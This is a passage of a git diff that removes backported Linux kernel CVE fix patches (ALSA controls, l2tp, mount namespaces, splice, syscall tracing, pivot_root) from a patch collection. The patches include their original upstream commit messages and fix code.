-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-index 46a0542..7d369ff 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c
-@@ -107,6 +107,17 @@ void msm_camera_io_memcpy(void __iomem *dest_addr,
- msm_camera_io_dump(dest_addr, len);
- }
-
-+void msm_camera_io_memcpy_mb(void __iomem *dest_addr,
-+ void __iomem *src_addr, u32 len)
-+{
-+ int i;
-+ u32 *d = (u32 *) dest_addr;
-+ u32 *s = (u32 *) src_addr;
-+
-+ for (i = 0; i < (len / 4); i++)
-+ msm_camera_io_w_mb(*s++, d++);
-+}
-+
- int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info,
- struct msm_cam_clk_info *clk_src_info, int num_clk)
- {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-index 2e6f809..90925a9 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h
-@@ -28,6 +28,8 @@ u32
msm_camera_io_r_mb(void __iomem *addr);
- void msm_camera_io_dump(void __iomem *addr, int size);
- void msm_camera_io_memcpy(void __iomem *dest_addr,
- void __iomem *src_addr, u32 len);
-+void msm_camera_io_memcpy_mb(void __iomem *dest_addr,
-+ void __iomem *src_addr, u32 len);
- int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info,
- struct msm_cam_clk_info *clk_src_info, int num_clk);
- int msm_cam_clk_enable(struct device *dev, struct msm_cam_clk_info *clk_info,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4655/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4655/ANY/0001.patch
deleted file mode 100644
index e310caaa..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4655/ANY/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From 82262a46627bebb0febcc26664746c25cef08563 Mon Sep 17 00:00:00 2001
-From: Lars-Peter Clausen
-Date: Wed, 18 Jun 2014 13:32:32 +0200
-Subject: ALSA: control: Fix replacing user controls
-
-There are two issues with the current implementation for replacing user
-controls. The first is that the code does not check if the control is actually a
-user control and neither does it check if the control is owned by the process
-that tries to remove it. That allows userspace applications to remove arbitrary
-controls, which can cause a user after free if a for example a driver does not
-expect a control to be removed from under its feed.
-
-The second issue is that on one hand when a control is replaced the
-user_ctl_count limit is not checked and on the other hand the user_ctl_count is
-increased (even though the number of user controls does not change). This allows
-userspace, once the user_ctl_count limit as been reached, to repeatedly replace
-a control until user_ctl_count overflows. Once that happens new controls can be
-added effectively bypassing the user_ctl_count limit.
-
-Both issues can be fixed by instead of open-coding the removal of the control
-that is to be replaced to use snd_ctl_remove_user_ctl(). This function does
-proper permission checks as well as decrements user_ctl_count after the control
-has been removed.
-
-Note that by using snd_ctl_remove_user_ctl() the check which returns -EBUSY at
-beginning of the function if the control already exists is removed. This is not
-a problem though since the check is quite useless, because the lock that is
-protecting the control list is released between the check and before adding the
-new control to the list, which means that it is possible that a different
-control with the same settings is added to the list after the check. Luckily
-there is another check that is done while holding the lock in snd_ctl_add(), so
-we'll rely on that to make sure that the same control is not added twice.
-
-Signed-off-by: Lars-Peter Clausen
-Acked-by: Jaroslav Kysela
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/control.c | 25 +++++++++----------------
- 1 file changed, 9 insertions(+), 16 deletions(-)
-
-diff --git a/sound/core/control.c b/sound/core/control.c
-index 00ab034..1f413c2 100644
---- a/sound/core/control.c
-+++ b/sound/core/control.c
-@@ -1154,8 +1154,6 @@ static int snd_ctl_elem_add(struct snd_ctl_file *file,
- struct user_element *ue;
- int idx, err;
-
-- if (!replace && card->user_ctl_count >= MAX_USER_CONTROLS)
-- return -ENOMEM;
- if (info->count < 1)
- return -EINVAL;
- access = info->access == 0 ? SNDRV_CTL_ELEM_ACCESS_READWRITE :
-@@ -1164,21 +1162,16 @@ static int snd_ctl_elem_add(struct snd_ctl_file *file,
- SNDRV_CTL_ELEM_ACCESS_TLV_READWRITE));
- info->id.numid = 0;
- memset(&kctl, 0, sizeof(kctl));
-- down_write(&card->controls_rwsem);
-- _kctl = snd_ctl_find_id(card, &info->id);
-- err = 0;
-- if (_kctl) {
-- if (replace)
-- err = snd_ctl_remove(card, _kctl);
-- else
-- err = -EBUSY;
-- } else {
-- if (replace)
-- err = -ENOENT;
-+
-+ if (replace) {
-+ err = snd_ctl_remove_user_ctl(file, &info->id);
-+ if (err)
-+ return err;
- }
-- up_write(&card->controls_rwsem);
-- if (err < 0)
-- return err;
-+
-+ if (card->user_ctl_count >= MAX_USER_CONTROLS)
-+ return -ENOMEM;
-+
- memcpy(&kctl.id, &info->id, sizeof(info->id));
- kctl.count = info->owner ? info->owner : 1;
- access |= SNDRV_CTL_ELEM_ACCESS_USER;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4656/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4656/ANY/0001.patch
deleted file mode 100644
index 416150ba..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4656/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 883a1d49f0d77d30012f114b2e19fc141beb3e8e Mon Sep 17 00:00:00 2001
-From: Lars-Peter Clausen
-Date: Wed, 18 Jun 2014 13:32:35 +0200
-Subject: ALSA: control: Make sure that id->index does not overflow
-
-The ALSA control code expects that the range of assigned indices to a control is
-continuous and does not overflow. Currently there are no checks to enforce this.
-If a control with a overflowing index range is created that control becomes
-effectively inaccessible and unremovable since snd_ctl_find_id() will not be
-able to find it. This patch adds a check that makes sure that controls with a
-overflowing index range can not be created.
-
-Signed-off-by: Lars-Peter Clausen
-Acked-by: Jaroslav Kysela
-Cc:
-Signed-off-by: Takashi Iwai
----
- sound/core/control.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/sound/core/control.c b/sound/core/control.c
-index 8d6e4ba..f0b0e14 100644
---- a/sound/core/control.c
-+++ b/sound/core/control.c
-@@ -342,6 +342,9 @@ int snd_ctl_add(struct snd_card *card, struct snd_kcontrol *kcontrol)
- if (snd_BUG_ON(!card || !kcontrol->info))
- goto error;
- id = kcontrol->id;
-+ if (id.index > UINT_MAX - kcontrol->count)
-+ goto error;
-+
- down_write(&card->controls_rwsem);
- if (snd_ctl_find_id(card, &id)) {
- up_write(&card->controls_rwsem);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4943/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-4943/3.2/0001.patch
deleted file mode 100644
index 8ec81add..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4943/3.2/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 1179c8f1caca90caf4ce0eec54b499de4f1551c4 Mon Sep 17 00:00:00 2001
-From: Sasha Levin
-Date: Mon, 14 Jul 2014 17:02:31 -0700
-Subject: net/l2tp: don't fall back on UDP [get|set]sockopt
-
-commit 3cf521f7dc87c031617fd47e4b7aa2593c2f3daf upstream.
-
-The l2tp [get|set]sockopt() code has fallen back to the UDP functions
-for socket option levels != SOL_PPPOL2TP since day one, but that has
-never actually worked, since the l2tp socket isn't an inet socket.
-
-As David Miller points out:
-
- "If we wanted this to work, it'd have to look up the tunnel and then
- use tunnel->sk, but I wonder how useful that would be"
-
-Since this can never have worked so nobody could possibly have depended
-on that functionality, just remove the broken code and return -EINVAL.
-
-Reported-by: Sasha Levin
-Acked-by: James Chapman
-Acked-by: David Miller
-Cc: Phil Turnbull
-Cc: Vegard Nossum
-Cc: Willy Tarreau
-Signed-off-by: Linus Torvalds
-Signed-off-by: Ben Hutchings
----
- net/l2tp/l2tp_ppp.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
-index e0f0934..437fb59 100644
---- a/net/l2tp/l2tp_ppp.c
-+++ b/net/l2tp/l2tp_ppp.c
-@@ -1351,7 +1351,7 @@ static int pppol2tp_setsockopt(struct socket *sock, int level, int optname,
- int err;
-
- if (level != SOL_PPPOL2TP)
-- return udp_prot.setsockopt(sk, level, optname, optval, optlen);
-+ return -EINVAL;
-
- if (optlen < sizeof(int))
- return -EINVAL;
-@@ -1477,7 +1477,7 @@ static int pppol2tp_getsockopt(struct socket *sock, int level,
- struct pppol2tp_session *ps;
-
- if (level != SOL_PPPOL2TP)
-- return udp_prot.getsockopt(sk, level, optname, optval, optlen);
-+ return -EINVAL;
-
- if (get_user(len, (int __user *) optlen))
- return -EFAULT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4943/^3.15/0002.patch b/Patches/Linux_CVEs/CVE-2014-4943/^3.15/0002.patch
deleted file mode 100644
index d1b4c1ef..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4943/^3.15/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 3cf521f7dc87c031617fd47e4b7aa2593c2f3daf Mon Sep 17 00:00:00 2001
-From: Sasha Levin
-Date: Mon, 14 Jul 2014 17:02:31 -0700
-Subject: [PATCH] net/l2tp: don't fall back on UDP [get|set]sockopt
-
-The l2tp [get|set]sockopt() code has fallen back to the UDP functions
-for socket option levels != SOL_PPPOL2TP since day one, but that has
-never actually worked, since the l2tp socket isn't an inet socket.
-
-As David Miller points out:
-
- "If we wanted this to work, it'd have to look up the tunnel and then
- use tunnel->sk, but I wonder how useful that would be"
-
-Since this can never have worked so nobody could possibly have depended
-on that functionality, just remove the broken code and return -EINVAL.
-
-Reported-by: Sasha Levin
-Acked-by: James Chapman
-Acked-by: David Miller
-Cc: Phil Turnbull
-Cc: Vegard Nossum
-Cc: Willy Tarreau
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
----
- net/l2tp/l2tp_ppp.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
-index 950909f04ee6a..13752d96275e8 100644
---- a/net/l2tp/l2tp_ppp.c
-+++ b/net/l2tp/l2tp_ppp.c
-@@ -1365,7 +1365,7 @@ static int pppol2tp_setsockopt(struct socket *sock, int level, int optname,
- int err;
-
- if (level != SOL_PPPOL2TP)
-- return udp_prot.setsockopt(sk, level, optname, optval, optlen);
-+ return -EINVAL;
-
- if (optlen < sizeof(int))
- return -EINVAL;
-@@ -1491,7 +1491,7 @@ static int pppol2tp_getsockopt(struct socket *sock, int level, int optname,
- struct pppol2tp_session *ps;
-
- if (level != SOL_PPPOL2TP)
-- return udp_prot.getsockopt(sk, level, optname, optval, optlen);
-+ return -EINVAL;
-
- if (get_user(len, optlen))
- return -EFAULT;
diff --git a/Patches/Linux_CVEs/CVE-2014-5206/^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2014-5206/^3.16/0001.patch
deleted file mode 100644
index 3ca832c9..00000000
--- a/Patches/Linux_CVEs/CVE-2014-5206/^3.16/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From a6138db815df5ee542d848318e5dae681590fccd Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman"
-Date: Mon, 28 Jul 2014 16:26:53 -0700
-Subject: [PATCH] mnt: Only change user settable mount flags in remount
-
-Kenton Varda discovered that by remounting a
-read-only bind mount read-only in a user namespace the
-MNT_LOCK_READONLY bit would be cleared, allowing an unprivileged user
-to the remount a read-only mount read-write.
-
-Correct this by replacing the mask of mount flags to preserve
-with a mask of mount flags that may be changed, and preserve
-all others. This ensures that any future bugs with this mask and
-remount will fail in an easy to detect way where new mount flags
-simply won't change.
-
-Cc: stable@vger.kernel.org
-Acked-by: Serge E. Hallyn
-Signed-off-by: "Eric W. Biederman"
----
- fs/namespace.c | 2 +-
- include/linux/mount.h | 4 +++-
- 2 files changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index 7187d01329c35..cb40449ea0dfe 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -1937,7 +1937,7 @@ static int do_remount(struct path *path, int flags, int mnt_flags,
- err = do_remount_sb(sb, flags, data, 0);
- if (!err) {
- lock_mount_hash();
-- mnt_flags |= mnt->mnt.mnt_flags & MNT_PROPAGATION_MASK;
-+ mnt_flags |= mnt->mnt.mnt_flags & ~MNT_USER_SETTABLE_MASK;
- mnt->mnt.mnt_flags = mnt_flags;
- touch_mnt_namespace(mnt->mnt_ns);
- unlock_mount_hash();
-diff --git a/include/linux/mount.h b/include/linux/mount.h
-index 839bac2709048..b637a89e1faeb 100644
---- a/include/linux/mount.h
-+++ b/include/linux/mount.h
-@@ -42,7 +42,9 @@ struct mnt_namespace;
- * flag, consider how it interacts with shared mounts.
- */
- #define MNT_SHARED_MASK (MNT_UNBINDABLE)
--#define MNT_PROPAGATION_MASK (MNT_SHARED | MNT_UNBINDABLE)
-+#define MNT_USER_SETTABLE_MASK (MNT_NOSUID | MNT_NODEV | MNT_NOEXEC \
-+ | MNT_NOATIME | MNT_NODIRATIME | MNT_RELATIME \
-+ | MNT_READONLY)
-
- #define MNT_INTERNAL_FLAGS (MNT_SHARED | MNT_WRITE_HOLD | MNT_INTERNAL | \
- MNT_DOOMED | MNT_SYNC_UMOUNT | MNT_MARKED)
diff --git a/Patches/Linux_CVEs/CVE-2014-7822/3.2-^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2014-7822/3.2-^3.16/0001.patch
deleted file mode 100644
index a501664e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7822/3.2-^3.16/0001.patch
+++ /dev/null
@@ -1,72 +0,0 @@
-From 894c6350eaad7e613ae267504014a456e00a3e2a Mon Sep 17 00:00:00 2001
-From: Ben Hutchings
-Date: Thu, 29 Jan 2015 02:50:33 +0000
-Subject: splice: Apply generic position and size checks to each write
-
-We need to check the position and size of file writes against various
-limits, using generic_write_check(). This was not being done for
-the splice write path. It was fixed upstream by commit 8d0207652cbe
-("->splice_write() via ->write_iter()") but we can't apply that.
-
-CVE-2014-7822
-
-Signed-off-by: Ben Hutchings
----
- fs/ocfs2/file.c | 8 ++++++--
- fs/splice.c | 8 ++++++--
- 2 files changed, 12 insertions(+), 4 deletions(-)
-
-diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
-index d20d64c..0de24a2 100644
---- a/fs/ocfs2/file.c
-+++ b/fs/ocfs2/file.c
-@@ -2468,9 +2468,7 @@ static ssize_t ocfs2_file_splice_write(struct pipe_inode_info *pipe,
- struct address_space *mapping = out->f_mapping;
- struct inode *inode = mapping->host;
- struct splice_desc sd = {
-- .total_len = len,
- .flags = flags,
-- .pos = *ppos,
- .u.file = out,
- };
-
-@@ -2480,6 +2478,12 @@ static ssize_t ocfs2_file_splice_write(struct pipe_inode_info *pipe,
- out->f_path.dentry->d_name.len,
- out->f_path.dentry->d_name.name, len);
-
-+ ret = generic_write_checks(out, ppos, &len, 0);
-+ if (ret)
-+ return ret;
-+ sd.total_len = len;
-+ sd.pos = *ppos;
-+
- if (pipe->inode)
- mutex_lock_nested(&pipe->inode->i_mutex, I_MUTEX_PARENT);
-
-diff --git a/fs/splice.c b/fs/splice.c
-index 714471d..34c2b2b 100644
---- a/fs/splice.c
-+++ b/fs/splice.c
-@@ -1013,13 +1013,17 @@ generic_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
- struct address_space *mapping = out->f_mapping;
- struct inode *inode = mapping->host;
- struct splice_desc sd = {
-- .total_len = len,
- .flags = flags,
-- .pos = *ppos,
- .u.file = out,
- };
- ssize_t ret;
-
-+ ret = generic_write_checks(out, ppos, &len, S_ISBLK(inode->i_mode));
-+ if (ret)
-+ return ret;
-+ sd.total_len = len;
-+ sd.pos = *ppos;
-+
- pipe_lock(pipe);
-
- splice_from_pipe_begin(&sd);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-7825/3.2/0001.patch
deleted file mode 100644
index 285a52c3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 6f25b4e75a87fea8087b543f3d1298d301d24ad7 Mon Sep 17 00:00:00 2001
-From: Will Deacon
-Date: Thu, 16 Aug 2012 18:14:14 +0100
-Subject: tracing/syscalls: Fix perf syscall tracing when syscall_nr == -1
-
-commit 60916a9382e88fbf5e54fd36a3e658efd7ab7bed upstream.
-
-syscall_get_nr can return -1 in the case that the task is not executing
-a system call.
-
-This patch fixes perf_syscall_{enter,exit} to check that the syscall
-number is valid before using it as an index into a bitmap.
-
-Link: http://lkml.kernel.org/r/1345137254-7377-1-git-send-email-will.deacon@arm.com
-
-Cc: Jason Baron
-Cc: Wade Farnsworth
-Cc: Frederic Weisbecker
-Signed-off-by: Will Deacon
-Signed-off-by: Steven Rostedt
-Signed-off-by: Ben Hutchings
----
- kernel/trace/trace_syscalls.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c
-index 7c75bbb..22a7c9b 100644
---- a/kernel/trace/trace_syscalls.c
-+++ b/kernel/trace/trace_syscalls.c
-@@ -519,6 +519,8 @@ static void perf_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- int size;
-
- syscall_nr = syscall_get_nr(current, regs);
-+ if (syscall_nr < 0)
-+ return;
- if (!test_bit(syscall_nr, enabled_perf_enter_syscalls))
- return;
-
-@@ -593,6 +595,8 @@ static void perf_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- int size;
-
- syscall_nr = syscall_get_nr(current, regs);
-+ if (syscall_nr < 0)
-+ return;
- if (!test_bit(syscall_nr, enabled_perf_exit_syscalls))
- return;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2014-7825/3.2/0002.patch
deleted file mode 100644
index 03003828..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0002.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 8043761416d5ae6d8fe5e95331d26465d52e8c6e Mon Sep 17 00:00:00 2001
-From: Rabin Vincent
-Date: Wed, 29 Oct 2014 23:06:58 +0100
-Subject: tracing/syscalls: Ignore numbers outside NR_syscalls' range
-
-commit 086ba77a6db00ed858ff07451bedee197df868c9 upstream.
-
-ARM has some private syscalls (for example, set_tls(2)) which lie
-outside the range of NR_syscalls. If any of these are called while
-syscall tracing is being performed, out-of-bounds array access will
-occur in the ftrace and perf sys_{enter,exit} handlers.
-
- # trace-cmd record -e raw_syscalls:* true && trace-cmd report
- ...
- true-653 [000] 384.675777: sys_enter: NR 192 (0, 1000, 3, 4000022, ffffffff, 0)
- true-653 [000] 384.675812: sys_exit: NR 192 = 1995915264
- true-653 [000] 384.675971: sys_enter: NR 983045 (76f74480, 76f74000, 76f74b28, 76f74480, 76f76f74, 1)
- true-653 [000] 384.675988: sys_exit: NR 983045 = 0
- ...
-
- # trace-cmd record -e syscalls:* true
- [ 17.289329] Unable to handle kernel paging request at virtual address aaaaaace
- [ 17.289590] pgd = 9e71c000
- [ 17.289696] [aaaaaace] *pgd=00000000
- [ 17.289985] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
- [ 17.290169] Modules linked in:
- [ 17.290391] CPU: 0 PID: 704 Comm: true Not tainted 3.18.0-rc2+ #21
- [ 17.290585] task: 9f4dab00 ti: 9e710000 task.ti: 9e710000
- [ 17.290747] PC is at ftrace_syscall_enter+0x48/0x1f8
- [ 17.290866] LR is at syscall_trace_enter+0x124/0x184
-
-Fix this by ignoring out-of-NR_syscalls-bounds syscall numbers.
-
-Commit cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-added the check for less than zero, but it should have also checked
-for greater than NR_syscalls.
-
-Link: http://lkml.kernel.org/p/1414620418-29472-1-git-send-email-rabin@rab.in
-
-Fixes: cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-Signed-off-by: Rabin Vincent
-Signed-off-by: Steven Rostedt
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings
----
- kernel/trace/trace_syscalls.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c
-index 22a7c9b..1129062 100644
---- a/kernel/trace/trace_syscalls.c
-+++ b/kernel/trace/trace_syscalls.c
-@@ -309,7 +309,7 @@ void ftrace_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- int syscall_nr;
-
- syscall_nr = syscall_get_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
- if (!test_bit(syscall_nr, enabled_enter_syscalls))
- return;
-@@ -349,7 +349,7 @@ void ftrace_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- int syscall_nr;
-
- syscall_nr = syscall_get_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
- if (!test_bit(syscall_nr, enabled_exit_syscalls))
- return;
-@@ -519,7 +519,7 @@ static void perf_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- int size;
-
- syscall_nr = syscall_get_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
- if (!test_bit(syscall_nr, enabled_perf_enter_syscalls))
- return;
-@@ -595,7 +595,7 @@ static void perf_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- int size;
-
- syscall_nr = syscall_get_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
- if (!test_bit(syscall_nr, enabled_perf_exit_syscalls))
- return;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7825/^3.17/0003.patch b/Patches/Linux_CVEs/CVE-2014-7825/^3.17/0003.patch
deleted file mode 100644
index 96490c3e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7825/^3.17/0003.patch
+++ /dev/null
@@ -1,85 +0,0 @@
-From 086ba77a6db00ed858ff07451bedee197df868c9 Mon Sep 17 00:00:00 2001
-From: Rabin Vincent
-Date: Wed, 29 Oct 2014 23:06:58 +0100
-Subject: [PATCH] tracing/syscalls: Ignore numbers outside NR_syscalls' range
-
-ARM has some private syscalls (for example, set_tls(2)) which lie
-outside the range of NR_syscalls. If any of these are called while
-syscall tracing is being performed, out-of-bounds array access will
-occur in the ftrace and perf sys_{enter,exit} handlers.
-
- # trace-cmd record -e raw_syscalls:* true && trace-cmd report
- ...
- true-653 [000] 384.675777: sys_enter: NR 192 (0, 1000, 3, 4000022, ffffffff, 0)
- true-653 [000] 384.675812: sys_exit: NR 192 = 1995915264
- true-653 [000] 384.675971: sys_enter: NR 983045 (76f74480, 76f74000, 76f74b28, 76f74480, 76f76f74, 1)
- true-653 [000] 384.675988: sys_exit: NR 983045 = 0
- ...
-
- # trace-cmd record -e syscalls:* true
- [ 17.289329] Unable to handle kernel paging request at virtual address aaaaaace
- [ 17.289590] pgd = 9e71c000
- [ 17.289696] [aaaaaace] *pgd=00000000
- [ 17.289985] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
- [ 17.290169] Modules linked in:
- [ 17.290391] CPU: 0 PID: 704 Comm: true Not tainted 3.18.0-rc2+ #21
- [ 17.290585] task: 9f4dab00 ti: 9e710000 task.ti: 9e710000
- [ 17.290747] PC is at ftrace_syscall_enter+0x48/0x1f8
- [ 17.290866] LR is at syscall_trace_enter+0x124/0x184
-
-Fix this by ignoring out-of-NR_syscalls-bounds syscall numbers.
-
-Commit cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-added the check for less than zero, but it should have also checked
-for greater than NR_syscalls.
-
-Link: http://lkml.kernel.org/p/1414620418-29472-1-git-send-email-rabin@rab.in
-
-Fixes: cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-Cc: stable@vger.kernel.org # 2.6.33+
-Signed-off-by: Rabin Vincent
-Signed-off-by: Steven Rostedt
----
- kernel/trace/trace_syscalls.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c
-index 4dc8b79c5f75d..29228c4d56969 100644
---- a/kernel/trace/trace_syscalls.c
-+++ b/kernel/trace/trace_syscalls.c
-@@ -313,7 +313,7 @@ static void ftrace_syscall_enter(void *data, struct pt_regs *regs, long id)
- int size;
-
- syscall_nr = trace_get_syscall_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
-
- /* Here we're inside tp handler's rcu_read_lock_sched (__DO_TRACE) */
-@@ -360,7 +360,7 @@ static void ftrace_syscall_exit(void *data, struct pt_regs *regs, long ret)
- int syscall_nr;
-
- syscall_nr = trace_get_syscall_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
-
- /* Here we're inside tp handler's rcu_read_lock_sched (__DO_TRACE()) */
-@@ -567,7 +567,7 @@ static void perf_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- int size;
-
- syscall_nr = trace_get_syscall_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
- if (!test_bit(syscall_nr, enabled_perf_enter_syscalls))
- return;
-@@ -641,7 +641,7 @@ static void perf_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- int size;
-
- syscall_nr = trace_get_syscall_nr(current, regs);
-- if (syscall_nr < 0)
-+ if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- return;
- if (!test_bit(syscall_nr, enabled_perf_exit_syscalls))
- return;
diff --git a/Patches/Linux_CVEs/CVE-2014-7970/3.0/0001.patch b/Patches/Linux_CVEs/CVE-2014-7970/3.0/0001.patch
deleted file mode 100644
index d796bb59..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7970/3.0/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From c88f7bbd8026761a615c9969d186ffa2a1a3da3c Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman"
-Date: Thu, 15 Jan 2015 17:49:27 +0000
-Subject: [PATCH] mnt: Prevent pivot_root from creating a loop in the mount
- tree
-
-Andy Lutomirski recently demonstrated that when chroot is used to set
-the root path below the path for the new ``root'' passed to pivot_root
-the pivot_root system call succeeds and leaks mounts.
-
-In examining the code I see that starting with a new root that is
-below the current root in the mount tree will result in a loop in the
-mount tree after the mounts are detached and then reattached to one
-another. Resulting in all kinds of ugliness including a leak of that
-mounts involved in the leak of the mount loop.
-
-Prevent this problem by ensuring that the new mount is reachable from
-the current root of the mount tree.
-
-[Added stable cc. Fixes CVE-2014-7970. --Andy]
-
-Cc: stable@vger.kernel.org
-Reported-by: Andy Lutomirski
-Reviewed-by: Andy Lutomirski
-Link: http://lkml.kernel.org/r/87bnpmihks.fsf@x220.int.ebiederm.org
-Signed-off-by: "Eric W. Biederman"
-Signed-off-by: Andy Lutomirski
-(backported from commit 0d0826019e529f21c84687521d03f60cd241ca7d)
-CVE-2014-7970
-BugLink: http://bugs.launchpad.net/bugs/1383356
-Signed-off-by: Luis Henriques
-Acked-by: Stefan Bader
-Acked-by: Andy Whitcroft
-Signed-off-by: Andy Whitcroft
-
-Change-Id: I0fe1d090eeb4765cc49401784e44a430f9585498
----
- fs/namespace.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index 912d273d970..4f47629a4e0 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -2618,6 +2618,9 @@ SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
- goto out4;
- } else if (!is_subdir(old.dentry, new.dentry))
- goto out4;
-+ /* make certain new is below the root */
-+ if (!is_path_reachable(new.mnt, new.dentry, &root))
-+ goto out4;
- br_write_lock(vfsmount_lock);
- detach_mnt(new.mnt, &parent_path);
- detach_mnt(root.mnt, &root_parent);
diff --git a/Patches/Linux_CVEs/CVE-2014-7970/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2014-7970/3.4/0002.patch
deleted file mode 100644
index f98e9796..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7970/3.4/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 9f7d53c09a1f87ebe228b55a83c1b8f952d76260 Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman"
-Date: Wed, 8 Oct 2014 10:42:27 -0700
-Subject: mnt: Prevent pivot_root from creating a loop in the mount tree
-
-commit 0d0826019e529f21c84687521d03f60cd241ca7d upstream.
-
-Andy Lutomirski recently demonstrated that when chroot is used to set
-the root path below the path for the new ``root'' passed to pivot_root
-the pivot_root system call succeeds and leaks mounts.
-
-In examining the code I see that starting with a new root that is
-below the current root in the mount tree will result in a loop in the
-mount tree after the mounts are detached and then reattached to one
-another. Resulting in all kinds of ugliness including a leak of that
-mounts involved in the leak of the mount loop.
-
-Prevent this problem by ensuring that the new mount is reachable from
-the current root of the mount tree.
-
-[Added stable cc. Fixes CVE-2014-7970. --Andy]
-
-Reported-by: Andy Lutomirski
